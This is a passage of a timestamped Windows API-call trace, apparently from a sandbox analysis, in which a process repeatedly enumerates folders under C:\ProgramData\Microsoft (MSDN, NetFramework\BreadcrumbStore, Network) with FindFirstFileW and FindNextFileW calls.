ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8.0", cAlternateFileName="")) returned 0 [0197.482] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0197.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0197.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0197.482] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MSDN", lpFilePart=0x0) returned 0x1d [0197.482] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MSDN\\", lpFilePart=0x0) returned 0x1e [0197.482] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.482] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.483] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8.0", cAlternateFileName="")) returned 1 [0197.483] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0197.483] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0197.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0197.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0197.483] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\8.0", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MSDN\\8.0", lpFilePart=0x0) returned 0x21 [0197.483] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\8.0\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MSDN\\8.0\\", lpFilePart=0x0) returned 0x22 [0197.483] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.484] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.484] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0197.484] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0197.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0197.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0197.485] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\8.0", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MSDN\\8.0", lpFilePart=0x0) returned 0x21 [0197.485] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\8.0\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\MSDN\\8.0\\", lpFilePart=0x0) returned 0x22 [0197.485] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\MSDN\\8.0\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.485] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.485] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0197.485] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0197.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0197.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0197.486] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\NetFramework", lpFilePart=0x0) returned 0x25 [0197.486] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\NetFramework\\", lpFilePart=0x0) returned 0x26 [0197.486] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.487] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.488] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0197.488] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 0 [0197.488] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0197.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0197.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0197.488] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\NetFramework", lpFilePart=0x0) returned 0x25 [0197.488] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\NetFramework\\", lpFilePart=0x0) returned 0x26 [0197.488] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.489] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.489] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0197.489] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0197.489] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0197.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0197.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0197.490] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore", lpFilePart=0x0) returned 0x35 [0197.490] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\", lpFilePart=0x0) returned 0x36 [0197.490] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.490] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.490] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0197.491] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0197.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0197.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0197.491] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore", lpFilePart=0x0) returned 0x35 [0197.491] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\", lpFilePart=0x0) returned 0x36 [0197.491] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.491] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.492] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0197.492] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0197.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0197.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0197.492] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network", lpFilePart=0x0) returned 0x20 [0197.492] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\", lpFilePart=0x0) returned 0x21 [0197.492] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.493] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.493] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0197.493] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0197.494] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 0 [0197.494] FindClose (in: hFindFile=0xb7f5d0 | out: hFindFile=0xb7f5d0) returned 1 [0197.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0197.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0197.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0197.494] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network", lpFilePart=0x0) returned 0x20 [0197.494] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Network\\", lpFilePart=0x0) returned 0x21 [0197.494] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Network\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f5d0 [0197.494] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.495] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0197.495] FindNextFileW (in: hFindFile=0xb7f5d0, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0197.495] FindNextFileW 